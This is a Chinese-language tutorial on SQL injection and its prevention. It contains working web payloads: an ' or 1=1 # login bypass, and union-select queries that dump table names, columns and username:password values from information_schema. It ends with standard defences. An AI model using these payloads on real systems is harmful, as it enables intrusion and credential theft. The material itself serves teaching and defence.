主頁(yè) > 知識(shí)庫(kù) > SQL注入的實(shí)現(xiàn)以及防范示例詳解

SQL注入的實(shí)現(xiàn)以及防范示例詳解

熱門標(biāo)簽:江西南昌百應(yīng)電話機(jī)器人 400電話從哪里申請(qǐng)濱州 杭州400電話如何申請(qǐng)的 高德地圖標(biāo)注商家在哪 機(jī)器人電話機(jī)創(chuàng)意繪畫 天音通信電話機(jī)器人 hbuilder地圖標(biāo)注 400電話申請(qǐng)?jiān)趺纯?/a> 隨州營(yíng)銷電話機(jī)器人怎么樣

什么是SQL注入

SQL注入是指通過(guò)構(gòu)建特殊的輸入篡改原來(lái)的SQL語(yǔ)句達(dá)到攻擊者所需的操作。

Sql 注入產(chǎn)生原因

我們?cè)L問(wèn)動(dòng)態(tài)網(wǎng)頁(yè)時(shí)往往會(huì)向服務(wù)器發(fā)送請(qǐng)求,服務(wù)器向數(shù)據(jù)訪問(wèn)層發(fā)起 Sql 查詢請(qǐng)求,若驗(yàn)證通過(guò)就會(huì)執(zhí)行 Sql 語(yǔ)句。如果用戶輸入的數(shù)據(jù)被構(gòu)造成惡意Sql代碼,如果程序沒(méi)有細(xì)致地過(guò)濾用戶輸入的數(shù)據(jù)則會(huì)使非法數(shù)據(jù)侵入系統(tǒng)。

登錄案例講解

select * from admin where uname='用戶名' and pwd='密碼'

輸入 'or 1=1 #(–空格或–+或#:注釋掉后面的sql語(yǔ)句)

這時(shí)SQL語(yǔ)句變?yōu)椋?code>select * from admin where uname='' or 1=1 # and pwd='密碼',這時(shí)SQL語(yǔ)句永遠(yuǎn)成立,繞過(guò)登錄。

基于GET方式的SQL注入

通過(guò)在URL中修改對(duì)應(yīng)的ID值,為正常數(shù)字、大數(shù)字、字符(單引號(hào)、雙引號(hào)、雙單引號(hào)、括號(hào))、反斜杠來(lái)探測(cè)URL中是否有注入點(diǎn)。

可登陸到mituan.zone進(jìn)行測(cè)試

1、' '1'' LIMIT 0,1 ' :多了一個(gè)單引號(hào)

可猜測(cè)SQL語(yǔ)句為:select login_name,password from admin where id = 'id' limit 0,1

2、' ' LIMIT 0,1 ':多了一個(gè)單引號(hào)

可猜測(cè)SQL語(yǔ)句為:select login_name,password from admin where id = id limit 0,1

3、' '1'') LIMIT 0,1 ':多了一個(gè)單引號(hào)

可猜測(cè)SQL語(yǔ)句為:select login_name,password from admin where id = ('id') limit 0,1

4、單引號(hào)、括號(hào)都不報(bào)錯(cuò)說(shuō)明被接收的是字符串類型' "1"") LIMIT 0,1 ':多了一個(gè)雙引號(hào)

可猜測(cè)SQL語(yǔ)句為:select login_name,password from admin where id = ("id") limit 0,1

SQL注入利用

1、利用order by判斷字段數(shù)

order by n(n為猜測(cè)字段數(shù))--+

以案例一為例

select login_name,password from admin where id = 'id' limit 0,1
用?id=1' order by 11--+

猜測(cè)錯(cuò)誤時(shí)則會(huì)報(bào)錯(cuò)

此時(shí)探測(cè)到有3個(gè)字段,用?id=0' union select 1,2,3--+探測(cè)到Login_name在第二列,Password在第三列,則第二、三列可利用。

?id=0' union select 1,2,3--+2,3改為user():查看當(dāng)前MYSQL登錄用戶名,database():查看當(dāng)前使用MYSQL數(shù)據(jù)庫(kù)名,version():查看當(dāng)前MYSQL版本,如改為?id=0'union select 1,user(),database()--+ 得到下圖中信息

2、利用union select 聯(lián)合查詢,獲取表名。(在使用union select時(shí)要將前面的SQL語(yǔ)句報(bào)錯(cuò))

union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

3、利用union select 聯(lián)合查詢,獲取字段名。(以上面查詢到的users表為例)

union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

4、利用union select 聯(lián)合查詢,獲取字段值。(以上面查詢到的users表為例)

union select 1,group_concat(username,0x3a,password),3 from users--+ (0x3a為冒號(hào),用來(lái)分隔不同字段的值)

如果是地址欄不能顯示信息的POST形式則可以在對(duì)話框中輸入注入語(yǔ)句






這里使用的方法和在地址欄中的輸入一樣,都是先報(bào)錯(cuò)前面的SQL語(yǔ)句再使用union select聯(lián)合查詢拿出表中數(shù)據(jù)

SQL 注入的防范方法

  • 對(duì)用戶的輸入進(jìn)行過(guò)濾。如:對(duì)用戶的輸入進(jìn)行校驗(yàn),可以通過(guò)正則表達(dá)式、限制長(zhǎng)度、對(duì)單引號(hào)和雙"-"進(jìn)行轉(zhuǎn)換等。
  • 編寫程序時(shí)不要使用動(dòng)態(tài)拼裝sql,可以使用參數(shù)化的sql或者直接使用存儲(chǔ)過(guò)程進(jìn)行數(shù)據(jù)查詢存取。
  • 不要直接使用管理員權(quán)限的數(shù)據(jù)庫(kù)連接,每個(gè)應(yīng)用使用單獨(dú)的且權(quán)限有限的數(shù)據(jù)庫(kù)。
  • 不要把機(jī)密信息直接存放,加密或者h(yuǎn)ash掉密碼和敏感的信息。
  • 程序的異常信息應(yīng)該給出盡可能少的提示,最好使用自定義的錯(cuò)誤信息對(duì)原始錯(cuò)誤信息進(jìn)行包裝。

總結(jié)

到此這篇關(guān)于SQL注入的實(shí)現(xiàn)以及防范的文章就介紹到這了,更多相關(guān)SQL注入實(shí)現(xiàn)及防范內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!

您可能感興趣的文章:
  • Java SQL注入案例教程及html基礎(chǔ)入門
  • MyBatis下SQL注入攻擊的3種方式
  • Mybatis-Plus的應(yīng)用場(chǎng)景描述及注入SQL原理分析
  • 如何有效防止sql注入的方法
  • Java使用過(guò)濾器防止SQL注入XSS腳本注入的實(shí)現(xiàn)
  • 實(shí)例介紹SQL注入以及如何解決
  • 有效防止sql注入的方法演示
  • 數(shù)據(jù)庫(kù)之SQL注入原理以及過(guò)程的簡(jiǎn)單介紹

標(biāo)簽:葫蘆島 石嘴山 沈陽(yáng) 招商 昆明 保定 鶴崗 常德

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《SQL注入的實(shí)現(xiàn)以及防范示例詳解》,本文關(guān)鍵詞  SQL,注入,的,實(shí)現(xiàn),以及,防范,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問(wèn)題,煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無(wú)關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《SQL注入的實(shí)現(xiàn)以及防范示例詳解》相關(guān)的同類信息!
  • 本頁(yè)收集關(guān)于SQL注入的實(shí)現(xiàn)以及防范示例詳解的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章